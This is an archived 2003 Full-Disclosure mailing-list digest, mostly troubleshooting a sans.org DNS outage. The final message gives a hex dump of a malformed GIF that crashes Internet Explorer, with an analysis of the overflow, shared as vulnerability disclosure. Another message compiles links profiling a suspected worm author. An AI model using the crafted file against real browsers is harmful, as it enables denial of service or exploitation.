	      Record last updated on..: Tue, Sep 02, 2003
	
	They probably screwed up their nameserver. This is said to happen to
	even the pro's ;^>
	
	--
	martin;              (greetings from the heart of the sun.)
	  \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net@...duck
	
	invalid/expired pgp subkeys? use subkeys.pgp.net as keyserver!
	
	obviously the human brain works like a computer.
	since there are no stupid computers humans can't be stupid.
	there are just a few running windoze.
	
	
	
	--__--__--
	
	Message: 17
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 16:41:24 -0500
	From: "Jerry Heidtke" <jheidtke@...h.edu>
	To: "Marcus Graf" <m.graf@...menwelt.de>, <full-disclosure@...ts.netsys.com>
	
	
	The administrator of dshield has this to say about resolving sans.org:
	
	> I didn't find a NS, which resolves sans.org or isc.sans.org.
	> Anyone else?
	Our registrar (register.com) had problems with sans.org and it did get
	removed from some root servers. Hopefully this will be fixed soon.
	DShield.org may be affected as it uses the same infrastructure. I did
	try to move mail server records to make them work without 'sans.org'.
	--
	--------------------------------------------------------------
	Johannes Ullrich
	
	-----Original Message-----
	From: Marcus Graf [mailto:m.graf@...menwelt.de]
	Sent: Tuesday, September 02, 2003 4:12 PM
	To: full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] sans.org
	
	
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	
	no problems:
	www.sans.org => 65.173.218.106
	www.incidents.org => 63.100.47.45
	
	but the traceroute from here to www.sans.org dies at
	sl-escal-1-0-0.sprintlink.net [160.81.98.26]
	
	and the traceroute to www.incidents.org is interesting:
	
	...
	... 500.ATM4-0.GW5.IAD5.ALTER.NET [152.63.43.137]
	... 192.168.11.9 [192.168.11.9]
	
	misconfigured NAT ???
	
	Ciao
	  Marcus
	
	--
	Windows is not the answer.
	Windows is the question and the answer is no.
	
	
	_______________________________________________
	Full-Disclosure - We believe in it.
	Charter: http://lists.netsys.com/full-disclosure-charter.html
	
	
	
	--__--__--
	
	Message: 18
	Reply-To: "Kurt Seifried" <listuser@...fried.org>
	From: "Kurt Seifried" <listuser@...fried.org>
	To: <lepkie@...tmail.com>, <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] sans.org - OFFTOPIC
	Date: Tue, 2 Sep 2003 15:41:24 -0600
	
	In a word: yes. They work fine. Your DNS is buggered. Next time I suggest
	checking a website such as Sam Spade before emailing a list with thousands
	of subscribers for something as ridiculously trivial as this.
	
	
	Kurt Seifried, kurt@...fried.org
	A15B BEE5 B391 B9AD B0EF
	AEB0 AD63 0B4E AD56 E574
	http://seifried.org/security/
	
	
	----- Original Message -----
	From: "lepkie" <lepkie@...hmail.com>
	To: <full-disclosure@...ts.netsys.com>
	Sent: Tuesday, September 02, 2003 1:29 PM
	Subject: [Full-Disclosure] sans.org
	
	
	> maybe off topic
	>
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	>
	> %> host www.sans.org ns2.berkeley.edu
	> %> host www.sans.org ns1.ems.psu.edu
	> %> etc ....
	>
	> all report not found.
	>
	> Did they forget to pay the reg fee?
	
	
	--__--__--
	
	Message: 19
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 14:45:09 -0700
	From: "Ryan Lowdermilk" <RLowdermilk@...usa.com>
	To: <full-disclosure@...ts.netsys.com>
	
	
	
	--__--__--
	
	Message: 20
	Date: Tue, 02 Sep 2003 23:45:10 +0200
	To: lepkie@...tmail.com, full-disclosure@...ts.netsys.com
	From: B3r3n <B3r3n@...osnet.com>
	Subject: Re: [Full-Disclosure] sans.org
	
	 From France, sans.org resolves ok but not www.incidents.org
	
	# dig www.incidents.org
	
	; <<>> DiG 8.3 <<>> www.incidents.org
	;; res options: init recurs defnam dnsrch
	;; got answer:
	;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 2
	;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
	;; QUERY SECTION:
	;;      www.incidents.org, type = A, class = IN
	
	;; AUTHORITY SECTION:
	org.                    2h58m24s IN SOA  A7.NSTLD.COM. DOMADMIN.ULTRADNS.NET. (
	                                         2003168420      ; serial
	                                         30M             ; refresh
	                                         15M             ; retry
	                                         1W              ; expiry
	                                         1D )            ; minimum
	
	
	;; Total query time: 2 msec
	;; WHEN: Tue Sep  2 23:44:07 2003
	;; MSG SIZE  sent: 35  rcvd: 104
	
	
	
	--__--__--
	
	Message: 21
	From: "Bernie, CTA" <cta@...in.net>
	Organization: HCSIN
	To: full-disclosure@...ts.netsys.com
	Date: Tue, 02 Sep 2003 17:46:50 -0400
	Subject: Re: [Full-Disclosure] sans.org
	Reply-to: cta@...in.net
	CC: "lepkie" <lepkie@...hmail.com>
	
	nslookup says:
	NS1.HOMEPC.ORG is authoritative for
	sans.org and incidents.org
	
	Server:         NS1.HOMEPC.ORG
	Address:        66.129.1.102#53
	
	Name:   www.sans.org
	Address: 65.173.218.106
	
	and
	Server:         NS1.HOMEPC.ORG
	Address:        66.129.1.102#53
	
	www.incidents.org       canonical name = incidents.org.
	Name:   incidents.org
	Address: 63.100.47.45
	
	I can get to their webs by IP and http://isc.incidents.org/, so
	maybe someone infected the root servers, www CNAMEs?
	
	
	
	On 2 Sep 2003 at 12:29, lepkie wrote:
	
	> maybe off topic
	>
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	>
	> %> host www.sans.org ns2.berkeley.edu
	> %> host www.sans.org ns1.ems.psu.edu
	> %> etc ....
	>
	> all report not found.
	>
	> Did they forget to pay the reg fee?
	
	-
	****************************************************
	Bernie
	Chief Technology Architect
	Chief Security Officer
	cta@...in.net
	Euclidean Systems, Inc.
	*******************************************************
	// "There is no expedient to which a man will not go
	//    to avoid the pure labor of honest thinking."  
	//     Honest thought, the real business capital.   
	//      Observe> Think> Plan> Think> Do> Think>     
	*******************************************************
	
	
	
	--__--__--
	
	Message: 22
	From: Joshua Thomas <JThomas@...eronemedia.com>
	To: "'lepkie@...tmail.com'" <lepkie@...tmail.com>,
	   full-disclosure@...ts.netsys.com
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 17:52:18 -0400
	
	
	Not I, either. Nor a number of other people I've asked.
	
	Someone can resolve it to 65.173.218.106, which does appear to be the SANS
	portal site.
	
	Big DNS mistake? Hack? Didn't pay the bill? We'll find out eventually.
	
	Joshua Thomas
	Network Operations Engineer
	PowerOne Media, Inc.
	tel: 518-687-6143
	jthomas@...eronemedia.com
	
	-----Original Message-----
	From: lepkie [mailto:lepkie@...hmail.com]
	Sent: Tuesday, September 02, 2003 3:30 PM
	To: full-disclosure@...ts.netsys.com
	Subject: [Full-Disclosure] sans.org
	
	
	maybe off topic
	
	can anyone resolve www.sans.org or www.incidents.org?
	I tried several name servers and none return an A record.
	
	%> host www.sans.org ns2.berkeley.edu
	%> host www.sans.org ns1.ems.psu.edu
	%> etc ....
	
	all report not found.
	
	Did they forget to pay the reg fee?
	
	
	
	
	--__--__--
	
	Message: 23
	Date: Tue,  2 Sep 2003 15:16:34 -0600
	From: "Ben Nelson" <lists@...om600.org>
	Subject: Re: [Full-Disclosure] sans.org
	To: lepkie@...tmail.com
	Cc: full-disclosure@...ts.netsys.com
	
	I have 3 geographically dispersed data centers and 2 of the 3 can look up
	those names successfully.  The one that can not look them up can not look
	up www.giac.org either.
	
	
	On September 2, 1:29 pm "lepkie" <lepkie@...hmail.com> wrote:
	> maybe off topic
	>
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	>
	> %> host www.sans.org ns2.berkeley.edu
	> %> host www.sans.org ns1.ems.psu.edu
	> %> etc ....
	>
	> all report not found.
	>
	> Did they forget to pay the reg fee?
	
	
	--__--__--
	
	Message: 24
	From: "NDG" <nom.de.guerre@...bon.net>
	To: <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 16:43:45 -0500
	
	
	Ya know - I've been meaning to post this all day
	Marq@...uritynewsportal said he was getting there intermittently this
	morning
	So - I figured it was just a matter of time before I could get there from
	here
	
	
	
	
	maybe off topic
	
	can anyone resolve www.sans.org or www.incidents.org?
	I tried several name servers and none return an A record.
	
	%> host www.sans.org ns2.berkeley.edu
	%> host www.sans.org ns1.ems.psu.edu
	%> etc ....
	
	all report not found.
	
	Did they forget to pay the reg fee?
	
	
	
	
	
	--__--__--
	
	Message: 25
	Reply-To: "- o s g o -" <osgo@...mail.com>
	From: "- o s g o -" <osgo@...mail.com>
	To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com>
	Date: Tue, 2 Sep 2003 14:37:19 -0700
	Subject: [Full-Disclosure] Re: atari800 (200309-07)
	
	I think it's wonderful that in today's world, whenever we want to play:
	"Pong" or "Claim Jumper," circa 1982, there's always someone out of the last
	5 remaining earth-bound gamers warning us about a BO, r00ting the box and
	possibly turning the Atari800 emulator into an Intellivision.?   Or worse.
	
	I'm deeply encouraged that the last of the "Great Five Players" can safely
	continue their gaming experience.   Just don't mess with "Pole Position...."
	That's where I draw the line, OK?
	
	Warmest personal regards,
	-osgo
	
	> PACKAGE : atari800
	> SUMMARY : buffer overflow
	> DATE : 2003-09-02 14:03 UTC
	> EXPLOIT : local
	> VERSIONS AFFECTED : <atari800-1.3.0-r1
	> FIXED VERSION : >=atari800-1.3.0-r1
	> CVE : CAN-2003-0630
	>
	> - - - ---------------------------------------------------------------------
	>
	> atari800 contains a buffer overflow which could be used by an attacker
	> to gain root privileges. Although the atari800 package in Gentoo does not
	> install any files suid root we encourage our users to upgrade.
	
	
	--__--__--
	
	Message: 26
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: <cta@...in.net>, <full-disclosure@...ts.netsys.com>
	Cc: "'lepkie'" <lepkie@...hmail.com>
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 18:38:03 -0400
	
	Did someone at Register.com get conned to switch the name servers for
	SANS to homepc.org?  SANS has their domain name registration with
	Register.com:
	
	Technical Contact:
	      Register.Com
	      Domain Registrar
	      575 8th Avenue
	      New York, NY 10018
	      US
	      Phone: 902-749-2701
	      Fax..: 902-749-5429
	      Email: domain-registrar@...ister.com
	
	Richard
	
	-----Original Message-----
	From: full-disclosure-admin@...ts.netsys.com
	[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Bernie, CTA
	Sent: Tuesday, September 02, 2003 5:47 PM
	To: full-disclosure@...ts.netsys.com
	Cc: lepkie
	Subject: Re: [Full-Disclosure] sans.org
	
	
	nslookup says:
	NS1.HOMEPC.ORG is authoritative for
	sans.org and incidents.org
	
	Server:         NS1.HOMEPC.ORG
	Address:        66.129.1.102#53
	
	Name:   www.sans.org
	Address: 65.173.218.106
	
	and
	Server:         NS1.HOMEPC.ORG
	Address:        66.129.1.102#53
	
	www.incidents.org       canonical name = incidents.org.
	Name:   incidents.org
	Address: 63.100.47.45
	
	I can get to their webs by IP and http://isc.incidents.org/, so
	maybe someone infected the root servers, www CNAMEs?
	
	
	
	On 2 Sep 2003 at 12:29, lepkie wrote:
	
	> maybe off topic
	>
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	>
	> %> host www.sans.org ns2.berkeley.edu
	> %> host www.sans.org ns1.ems.psu.edu
	> %> etc ....
	>
	> all report not found.
	>
	> Did they forget to pay the reg fee?
	
	-
	****************************************************
	Bernie
	Chief Technology Architect
	Chief Security Officer
	cta@...in.net
	Euclidean Systems, Inc.
	*******************************************************
	// "There is no expedient to which a man will not go
	//    to avoid the pure labor of honest thinking."  
	//     Honest thought, the real business capital.   
	//      Observe> Think> Plan> Think> Do> Think>     
	*******************************************************
	
	
	
	
	--__--__--
	
	Message: 27
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: <cta@...in.net>, <full-disclosure@...ts.netsys.com>
	Cc: "'lepkie'" <lepkie@...hmail.com>
	Subject: RE: [Full-Disclosure] Email for sans.org?
	Date: Tue, 2 Sep 2003 18:42:06 -0400
	
	Any idea who is receiving email messages being sent to sans.org?
	
	Richard
	
	
	
	
	--__--__--
	
	Message: 28
	From: "james" <hackerwacker@...ermesa.com>
	To: <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 17:03:49 -0600
	
	gtld's can't seem to point an NS to these domains:
	
	[root@...g mrtg]# nslookup
	> server k.gtld-servers.net   
	Default server: k.gtld-servers.net
	Address: 192.52.178.30#53
	> set querytype=NS
	> sans.org
	Server:         k.gtld-servers.net
	Address:        192.52.178.30#53
	
	Non-authoritative answer:
	*** Can't find sans.org: No answer
	
	Authoritative answers can be found from:
	.       nameserver = i.root-servers.net.
	.       nameserver = d.root-servers.net.
	.       nameserver = c.root-servers.net.
	.       nameserver = k.root-servers.net.
	.       nameserver = f.root-servers.net.
	.       nameserver = m.root-servers.net.
	.       nameserver = h.root-servers.net.
	.       nameserver = b.root-servers.net.
	.       nameserver = j.root-servers.net.
	.       nameserver = e.root-servers.net.
	.       nameserver = l.root-servers.net.
	.       nameserver = a.root-servers.net.
	.       nameserver = g.root-servers.net.
	i.root-servers.net      internet address = 192.36.148.17
	d.root-servers.net      internet address = 128.8.10.90
	c.root-servers.net      internet address = 192.33.4.12
	k.root-servers.net      internet address = 193.0.14.129
	f.root-servers.net      internet address = 192.5.5.241
	m.root-servers.net      internet address = 202.12.27.33
	h.root-servers.net      internet address = 128.63.2.53
	b.root-servers.net      internet address = 128.9.0.107
	j.root-servers.net      internet address = 192.58.128.30
	e.root-servers.net      internet address = 192.203.230.10
	l.root-servers.net      internet address = 198.32.64.12
	a.root-servers.net      internet address = 198.41.0.4
	g.root-servers.net      internet address = 192.112.36.4
	>  www.incidents.org
	Server:         k.gtld-servers.net
	Address:        192.52.178.30#53
	
	Non-authoritative answer:
	*** Can't find www.incidents.org: No answer
	
	Authoritative answers can be found from:
	.       nameserver = m.root-servers.net.
	.       nameserver = h.root-servers.net.
	.       nameserver = b.root-servers.net.
	.       nameserver = j.root-servers.net.
	.       nameserver = e.root-servers.net.
	.       nameserver = l.root-servers.net.
	.       nameserver = a.root-servers.net.
	.       nameserver = g.root-servers.net.
	.       nameserver = i.root-servers.net.
	.       nameserver = d.root-servers.net.
	.       nameserver = c.root-servers.net.
	.       nameserver = k.root-servers.net.
	.       nameserver = f.root-servers.net.
	m.root-servers.net      internet address = 202.12.27.33
	h.root-servers.net      internet address = 128.63.2.53
	b.root-servers.net      internet address = 128.9.0.107
	j.root-servers.net      internet address = 192.58.128.30
	e.root-servers.net      internet address = 192.203.230.10
	l.root-servers.net      internet address = 198.32.64.12
	a.root-servers.net      internet address = 198.41.0.4
	g.root-servers.net      internet address = 192.112.36.4
	i.root-servers.net      internet address = 192.36.148.17
	d.root-servers.net      internet address = 128.8.10.90
	c.root-servers.net      internet address = 192.33.4.12
	k.root-servers.net      internet address = 193.0.14.129
	f.root-servers.net      internet address = 192.5.5.241
	> incidents.org
	Server:         k.gtld-servers.net
	Address:        192.52.178.30#53
	
	Non-authoritative answer:
	*** Can't find incidents.org: No answer
	
	Authoritative answers can be found from:
	.       nameserver = c.root-servers.net.
	.       nameserver = a.root-servers.net.
	.       nameserver = k.root-servers.net.
	.       nameserver = b.root-servers.net.
	.       nameserver = g.root-servers.net.
	.       nameserver = e.root-servers.net.
	.       nameserver = f.root-servers.net.
	.       nameserver = m.root-servers.net.
	.       nameserver = h.root-servers.net.
	.       nameserver = j.root-servers.net.
	.       nameserver = l.root-servers.net.
	.       nameserver = i.root-servers.net.
	.       nameserver = d.root-servers.net.
	c.root-servers.net      internet address = 192.33.4.12
	a.root-servers.net      internet address = 198.41.0.4
	k.root-servers.net      internet address = 193.0.14.129
	b.root-servers.net      internet address = 128.9.0.107
	g.root-servers.net      internet address = 192.112.36.4
	e.root-servers.net      internet address = 192.203.230.10
	f.root-servers.net      internet address = 192.5.5.241
	m.root-servers.net      internet address = 202.12.27.33
	h.root-servers.net      internet address = 128.63.2.53
	j.root-servers.net      internet address = 192.58.128.30
	l.root-servers.net      internet address = 198.32.64.12
	i.root-servers.net      internet address = 192.36.148.17
	d.root-servers.net      internet address = 128.8.10.90
	>
	
	
	--__--__--
	
	Message: 29
	From: David Vincent <david.vincent@...htyoaks.com>
	To: "'Full-Disclosure (E-mail)" <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] sans.org - OFFTOPIC
	Date: Tue, 2 Sep 2003 16:21:50 -0700
	
	> > ----- Original Message -----
	> > From: "lepkie" <lepkie@...hmail.com>
	> > To: <full-disclosure@...ts.netsys.com>
	> > Sent: Tuesday, September 02, 2003 1:29 PM
	> > Subject: [Full-Disclosure] sans.org
	> >
	> > maybe off topic
	> >
	> > can anyone resolve www.sans.org or www.incidents.org?
	> > I tried several name servers and none return an A record.
	> >
	> > %> host www.sans.org ns2.berkeley.edu
	> > %> host www.sans.org ns1.ems.psu.edu
	> > %> etc ....
	> >
	> > all report not found.
	> >
	> > Did they forget to pay the reg fee?
	
	> -----Original Message-----
	> From: Kurt Seifried [mailto:listuser@...fried.org]
	> Sent: September 2, 2003 2:41 PM
	> To: lepkie@...tmail.com; full-disclosure@...ts.netsys.com
	> Subject: Re: [Full-Disclosure] sans.org - OFFTOPIC
	>
	> In a word: yes. They work fine. Your DNS is buggered. Next
	> time I suggest
	> checking a website such as Sam Spade before emailing a list
	> with thousands
	> of subscribers for something as ridiculously trivial as this.
	>
	>
	> Kurt Seifried, kurt@...fried.org
	> A15B BEE5 B391 B9AD B0EF
	> AEB0 AD63 0B4E AD56 E574
	> http://seifried.org/security/
	
	kurt, STFU.
	
	some people may not have the same level of knowledge about troubleshooting
	issues like this.  they will ask questions you and i may be able to answer
	easily.  despite what you feel, they do have a right to read and post to
	these lists (at least, it is outside your purview).
	
	hell, sometimes even "the experts" don't have time to check out a little
	thing and will ask for help too.
	
	because it is trivial to you does not mean it is trivial to someone else.
	
	your trolling/flaming is useless.  it only shows you are not someone who is
	willing to help out, that you are someone it would be a waste of time
	talking to, and that you, in a word, suck.
	
	keep it to yourself.  if you think a post is useless, delete it.  don't
	bitch about it.  take some initiative.
	
	did you have too much coffee today and get all jittery?  or are you quitting
	smoking and are an extra bitch to bear today?  <-- those are rhetorical in
	case you weren't sure.
	
	-d
	
	
	--__--__--
	
	Message: 30
	From: Andre Ludwig <ALudwig@...fingroup.com>
	To:
	Cc: full-disclosure@...ts.netsys.com
	Date: Tue, 2 Sep 2003 16:32:47 -0700
	Subject: [Full-Disclosure] The Worm tard who got busted
	
	
	You guys are amazing sometimes, it looks like a few of you have in fact done
	some googling and some detective work.  Others are simply content on sitting
	on the sidelines and spewing only moderately informative opinions around
	like they are going out of style.
	
	If the topic of what this kid did and how stupid he was interests you go
	ahead and do some more detective work. The kid left one helluva trail on the
	net with SEVERAL postings on trojanforge.net (which has been offline since
	Friday). What was he posting about?  Normal script kiddie things like  y0
	d00dz ch3ck 0utz my l33t st4sh 0f spl01tz 4nd tr0j4nZ.  Not to mention
	asking about several small footprint irc based RAT's.   So 1+1=2, and in my
	book the kid is simply an amateur crook who should get the book thrown at
	him.  He would gain some respect from me if he had more skill, but im not a
	bleeding heart, you do the crime u do the time.   Granted i am not one to
	judge but if i was in the jury there wouldn't be much of a doubt in my mind
	as to who was behind things. 
	
	Wow he even looks to have defaced a site or two.. (look at the title of the
	window that loads)
	http://216.239.37.104/search?q=cache:t12Nd707VCkJ:www.satanosphere.com/+teek
	id&hl=en&ie=UTF-8
	
	Teekids Thoughts on VB6 vs .NET
	http://216.239.53.104/search?q=cache:oY-N3GP1w4cJ:www.trojanforge.net/showth
	read.php%3Fthreadid%3D1715++site:www.trojanforge.net+teekid+trojanforge&hl=e
	n&ie=UTF-8
	
	Teekid Hitting the wrong button (new thread instead of reply)
	http://216.239.53.104/search?q=cache:l8g2yTYshU4J:www.trojanforge.net/showth
	read.php%3Fthreadid%3D2627++site:www.trojanforge.net+teekid+trojanforge&hl=e
	n&ie=UTF-8
	
	Teekid Asking for a small footprint IRC boot with UDP features.
	http://216.239.53.104/search?q=cache:l8g2yTYshU4J:www.trojanforge.net/showth
	read.php%3Fthreadid%3D2627++site:www.trojanforge.net+teekid+trojanforge&hl=e
	n&ie=UTF-8
	
	Teekid Pimping his m4d l33t w4r3z.. (his trojan archive)
	http://216.239.53.104/search?q=cache:RFRMkPANScMJ:www.trojanforge.net/showth
	read/t-36.html++site:www.trojanforge.net+teekid+trojanforge&hl=en&ie=UTF-8
	
	Teekid shopping for a RAT
	http://216.239.53.104/search?q=cache:oSgqX5TAsQMJ:www.trojanforge.net/showth
	read/t-6016.html++site:www.trojanforge.net+teekid+trojanforge&hl=en&ie=UTF-8
	
	Teekid pimping his IRCBOTS site.
	http://216.239.53.104/search?q=cache:SUybKHSk8ncJ:www.trojanforge.net/showth
	read/t-2693.html++site:www.trojanforge.net+teekid+trojanforge&hl=en&ie=UTF-8
	
	Teekid coming to the aid of a fellow RAT developer (what a nice guy)
	http://216.239.37.104/search?q=cache:39FRhHqYu7cJ:www.trojanforge.net/showth
	read/t-5143.html++site:www.trojanforge.net+teekid+trojanforge&hl=en&ie=UTF-8
	
	All this was taken from only one site, if u want u can even find his
	flipping CS scores on several servers.  He wasn't too bad of a shot with a
	M4.
	
	And for fun
	http://asmallvictory.net/archives/jabbahack.jpg
	
	Are all virus coders so stunning and athletic looking?
	http://us.news1.yimg.com/us.yimg.com/p/rids/20030829/i/1062184970.2617294885
	.jpg
	
	Wow ever since the rash of articles about our favorite coder of the week it
	is a lot harder to find some of the stuff that i found on fri and sat. Sorry
	for the rant of sorts just sort of irked me that after reading 100 or so
	emails about the kid no one even bothered to bring up any sort of evidence
	that could have been gleaned ( thank god for Google cache). I would have
	posted more threads by the perp but the site is down, and while I'm sure with
	some more time and searching i could dig up irc chat logs, and other such
	info i unfortunately have a job to do (even though i hate it).
	
	Andre Ludwig, CISSP
	
	
	--__--__--
	
	Message: 31
	Reply-To: "Kurt Seifried" <listuser@...fried.org>
	From: "Kurt Seifried" <listuser@...fried.org>
	To: "james" <hackerwacker@...ermesa.com>, <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 18:12:11 -0600
	
	>gtld's can't seem to point an NS to these domains:
	>
	>[root@...g mrtg]# nslookup
	>> server k.gtld-servers.net
	>Default server: k.gtld-servers.net
	>Address: 192.52.178.30#53
	>> set querytype=NS
	>> sans.org
	>Server:         k.gtld-servers.net
	>Address:        192.52.178.30#53
	>
	>Non-authoritative answer:
	>*** Can't find sans.org: No answer
	
	
	This is ... rather normal. .org is served by *.NSTLD.COM now. .net and .com
	are still served by *.gtld-servers.net.
	
	It looks like register.com either hosed their database, or hosed records
	while trying to update various records (at the request of the owners or
	someone else, who knows).
	
	A variety of domains appear affected, sans.org, dhsield.org, incidents.org,
	homepc.org, etc. All .org, all related and sharing infrastructure
	apparently.
	
	Right now I'm inclined towards Occam's razor, this is a technical screw
	up/"normal" DNS modification and not something "evil".
	
	Kurt Seifried, kurt@...fried.org
	A15B BEE5 B391 B9AD B0EF
	AEB0 AD63 0B4E AD56 E574
	http://seifried.org/security/
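
The nslookup transcript discussed in this message can be read mechanically, shown here as an added example that is not part of the original post: when the authority section names only the root zone ("."), the queried server is handing the client back up the tree, which means it does not serve the name's TLD. The `classify` helper, the verdict labels and both sample transcripts (including the `*.example` names) are constructed for illustration.

```python
import re

# Patterns for the nslookup layout shown in the thread. A leading ">" or
# whitespace is tolerated so that mail-quoted transcripts parse as well.
SERVER = re.compile(r"^[> \t]*Server:[ \t]+(\S+)", re.M)
NO_ANSWER = re.compile(r"Can't find (\S+):")
NS_LINE = re.compile(r"^[> \t]*(\S+)[ \t]+nameserver = (\S+?)\.?[ \t]*$", re.M)

# Constructed sample, shortened from the session quoted in the thread.
UPWARD_REFERRAL = """\
Server:         k.gtld-servers.net
Address:        192.52.178.30#53

Non-authoritative answer:
*** Can't find sans.org: No answer

Authoritative answers can be found from:
.       nameserver = m.root-servers.net.
.       nameserver = a.root-servers.net.
m.root-servers.net      internet address = 202.12.27.33
a.root-servers.net      internet address = 198.41.0.4
"""

# Constructed contrast case in the same simplified layout: a server that does
# serve the TLD points *down* at the zone's own name servers (hypothetical names).
DELEGATION = """\
Server:         ns.tld-registry.example
Address:        192.0.2.53#53

Non-authoritative answer:
*** Can't find sans.org: No answer

Authoritative answers can be found from:
sans.org        nameserver = ns1.hosting.example.
sans.org        nameserver = ns2.hosting.example.
"""


def classify(transcript):
    """Summarise one nslookup 'No answer' reply and say where it points."""
    server = SERVER.search(transcript)
    missing = NO_ANSWER.search(transcript)
    referrals = NS_LINE.findall(transcript)

    qname = missing.group(1).rstrip(".").lower() if missing else None
    # Owner name of each NS record; the root zone is normalised to ".".
    zones = sorted({owner.lower().rstrip(".") or "." for owner, _ in referrals})
    nameservers = sorted({ns.lower() for _, ns in referrals})

    if not referrals:
        verdict = "no-referral"
    elif zones == ["."]:
        # Only the root is offered: the server knows nothing closer to the
        # name, so it is the wrong server to ask about this TLD.
        verdict = "upward-referral"
    elif qname and all(qname == z or qname.endswith("." + z) for z in zones):
        # NS records for the name itself or one of its parents below the root.
        verdict = "delegation"
    else:
        verdict = "inconsistent"

    return {
        "server": server.group(1) if server else None,
        "qname": qname,
        "zones": zones,
        "nameservers": nameservers,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for name, text in (("upward", UPWARD_REFERRAL), ("delegation", DELEGATION)):
        print(name, classify(text))
```

An `upward-referral` verdict says nothing about whether the domain exists; it only says the question went to a server that does not carry that TLD, so the lookup has to be repeated against the TLD's own servers before drawing conclusions about the registration.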
	
	
	
	
	--__--__--
	
	Message: 32
	Date: Tue, 2 Sep 2003 17:37:31 -0700
	From: Tim <tim-security@...tinelchicken.org>
	To: nonleft@....net
	Cc: zobel@...-online.de, full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	
	
	This is helpful.  In addition, thanks to a file format breakdown by
	Caraciola I was able to more reliably crash my IE.  By taking the last
	data block in the file and extending it by a few hundred bytes, I think
	I have found that an overflow exists.  I have begun debugging it, but I
	don't have a lot of good windows tools available to me, so someone else
	should give it a shot (and post to the list).
	
	The file I created, based on the original:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  GIF89a......
	0000000C   00 FF FF FF  00 00 00 21  F9 04 01 00  .......!....
	00000018   00 00 00 2C  00 00 00 00  01 00 01 00  ...,........
	00000024   00 00 01 41  41 41 41 41  41 41 41 41  ...AAAAAAAAA
	00000030   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000003C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000048   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000054   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000060   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000006C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000078   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000084   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000090   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000009C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000A8   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000B4   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000C0   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000CC   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000D8   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000E4   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000F0   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000FC   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000108   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000114   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000120   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000012C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000138   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000144   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000150   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000015C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000168   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000174   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000180   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000018C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000198   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000001A4   41 41 41 41  41 41 41 41  41 41 00 3B  AAAAAAAAAA.;
	
	
	It appears the subroutine that parses the gif image allocates a buffer
	of length based on the size indicated in the data block.  Then it
	proceeds to read the data block, looking for a 0x00 (or some other
	end-of-block identifier) to quit.  It doesn't limit itself to the block
	size when copying data from the file.
	
	I have not been able to determine whether this is a heap or stack
	overflow.
	
